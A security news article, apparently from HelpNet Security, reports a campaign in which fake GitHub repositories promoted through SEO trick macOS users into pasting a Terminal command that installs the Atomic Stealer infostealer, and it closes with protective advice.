MacOS Users Targeted by Atomic Stealer Malware on GitHub
▼ Summary
– A widespread malware campaign is targeting MacOS users by using SEO to push fraudulent GitHub repositories that impersonate popular software downloads.
– Attackers employ a social engineering trick, instructing users to run a terminal command that downloads and installs the Atomic infostealer malware.
– The campaign uses fake sites impersonating GitHub and tricks users into entering their device password to finalize the malicious installation.
– LastPass is disrupting the campaign by getting fraudulent repositories removed but warns users to remain cautious as the threat is ongoing.
– Users who installed the malware should assume their passwords and sensitive data are compromised and should avoid downloading software from unknown GitHub sources.
Individuals searching for widely used applications like LastPass, 1Password, After Effects, and Gemini on their Macs face a significant threat: inadvertently installing the Atomic Stealer malware instead. A new, widespread campaign is tricking users through fraudulent GitHub repositories that appear to offer legitimate software downloads.
Attackers are creating these deceptive repositories and then using search engine optimization (SEO) techniques to ensure links to their malicious pages appear prominently in search results on Google and Bing. According to analysis from LastPass, this scheme targets a broad spectrum of organizations, including technology firms, financial services, and password management companies. The GitHub pages are cleverly named, often combining the targeted software’s name with Mac-related terms, such as “LastPass Premium on MacBook.”
When a user clicks to download the software, they are redirected to a separate site designed to mimic GitHub. There, they receive instructions to copy and paste a specific command into their Mac’s Terminal application. Executing this command triggers a shell script that downloads and installs the AMOS malware onto the system. A final step requests the user’s device password to complete the installation, granting the malware full access.
This method employs a social engineering tactic known as the ClickFix trick, which bypasses macOS security features like Gatekeeper and XProtect by having the user manually initiate the installation process. This same technique was observed in a previous campaign distributing the Shamos infostealer.
In response, LastPass has been actively working to disrupt the operation by reporting the fake repositories to GitHub, leading to their removal. The secondary impersonation site has also been taken down. However, the persistence of the attackers means vigilance is crucial for all Mac users.
A recent report on the Atomic Stealer malware campaign reveals a list of indicators of compromise (IoCs), including the URLs of numerous malicious repositories. These deceptive sites targeted users searching for popular software, such as the audio editor Audacity. This tactic highlights a growing trend of attackers using fake, yet seemingly legitimate, download sources.
If you have installed this malware, it is critical to assume your sensitive data has been compromised. The malware is designed to steal a wide range of information, including passwords, browser cookies, online banking details, and cryptocurrency wallet keys. Immediate action is necessary: you must secure all accounts and change credentials on a clean device.
To protect yourself from such threats, adopting a few key security practices is essential. Always download software directly from an official developer’s website or a trusted app store. Avoid unverified GitHub repositories, as they are a frequent source for these kinds of attacks. Similarly, never run Terminal commands provided by unverified sources.
Finally, consider employing a robust endpoint security solution that can detect malicious activity even after a file has been executed. Staying informed about the latest cybersecurity threats is also a vital part of maintaining your digital safety.
(Source: HelpNet Security)
